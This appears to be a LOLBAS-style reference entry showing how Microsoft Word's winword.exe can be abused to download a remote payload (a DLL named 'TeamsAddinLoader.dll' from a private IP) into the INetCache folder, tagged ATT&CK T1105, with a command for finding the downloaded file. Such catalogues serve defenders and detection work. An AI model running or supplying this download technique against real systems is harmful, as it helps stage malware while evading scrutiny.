.. /Winword.exe
Star

Download (INetCache)

Microsoft Office binary


Paths:

Resources:
Acknowledgements:

Detection:

Download

  1. Downloads payload from remote server

    winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
    Use case
    It will download a remote payload and place it in INetCache.
    Privileges required
    User
    Operating systems
    Windows
    ATT&CK® technique
    T1105
    Tags
    Download: INetCache
    INetCache downloaders typically store files in a randomly-named folder under %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE, having added [1] or a higher number between the file's name and its extension.
    If you downloaded a file named XYZ.exe, the full path of the downloaded file can be obtained by executing the following command:
    cmd.exe /c "where /r %LOCALAPPDATA%\Microsoft\Windows\INetCache XYZ*"